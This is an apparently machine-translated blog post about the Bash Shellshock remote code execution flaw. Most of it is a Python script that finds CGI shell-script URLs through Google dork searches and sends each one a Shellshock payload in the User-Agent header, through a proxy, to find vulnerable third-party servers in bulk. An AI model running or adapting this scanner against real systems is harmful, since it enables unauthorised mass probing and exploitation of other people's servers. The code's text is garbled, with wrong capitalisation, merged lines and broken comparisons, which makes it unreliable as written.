Bash remote code execution vulnerabilities are really much more powerful than heart drops, but the impact is not very broad, but yesterday's analysis of the article bash The Remote Code execution vulnerability analysis at the end of this paper mentions the bulk problem of the vulnerability.
One of the easiest ways to do this is to use the search engine's hacking technology, where I use the Google hacking syntax to link crawling with Google API. Only in the domestic words .... Need to add agent.
The agent in the program is my local goagent agent, the port is 8087. How to detect vulnerabilities is also very simple, I am here directly based on the server return code to judge.
The idea is these, the following is as usual, paste code:
#coding =utf-8 Import Requests import JSON import threading import Socket vul_res = [] class Googleurlprovider () : Def __init__ (self,pagecount,proxies): Self.pagecount = PageCount #查询的页数 self.keywords = R ' Inurl:cgi-bin filetype:sh ' Self.apiurl = ' https://ajax.googleapis.com/ajax/services/search/web ' self.proxies = proxies def getrequest (Self,url ): Return Requests.get (Url,proxies=self.proxies,verify=false) def geturls (self): Ret_list = [] Tmp_list = [] for X in Xrange (0,self.pagecount): url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pagecount}". Format ( apiurl=self.apiurl,keywords=self.keywords,pagecount=x) try:r = self.getrequest (URL) results = json.loads (r.te
XT) If not results:continue infos = results[' responsedata ' [' Results '] if infos:for i in Infos: Tmp_list.append (i[' URL ')] except Exception, e:continue ret_list = ret_list + tmp_list return ret_list CLA SS Bashrcedetector (): Def __iniT__ (self,urls): self.urls = URL def detector (self): Global vul_res for X in Self.urls: #多线程执行 each = Eac Hworker (x) Each.start () each.join () ' Thread work class ' Class Eachworker (threading. Thread): Def __init__ (Self,url): Threading. Thread.__init__ (self) self.url = URL def run (self): global vul_res Useragent_header = {' User-agent ': ' () {1;} ;
echo ' eee '} try:r = Requests.get (self.url,headers = useragent_header,timeout=8) If R.status_code = 500: print ' {URL} has Bash RCE vulnerability '. Format (url=self.url) vul_res.append (self.url) Else:pass except Soc
Ket.timeout, E:pass except Requests.exceptions.Timeout, E:pass except Requests.exceptions.ConnectionError, E: Pass if __name__ = = ' __main__ ': print ' powered By:exploit qq:739858341 ' print ' This was a program which can use To scan the Bashrce vulnerability\nscanner working,please ... ' If Len (sys.argv)!= 2:print ' Usage:python bashrces Canner <googLe Pagecount> ' sys.exit () #goagent proxy #在这里修改, add your own agent to use proxies = {' http ': ' http://127.0.0.1:8087 ', ' https ' : "http://127.0.0.1:8087"} url_res = [] Vul_guys = [] Urlgetter = googleurlprovider (int (sys.argv[1)), proxies) url_res = Urlgetter.geturls () Bash_detector = Bashrcedetector (url_res) bash_detector.detector () If Len (vul_res) = = 0:print ' This group have no vulnerability ' else:print ' Find%d poor host (s) '% len (vul_res)
Run Screenshots: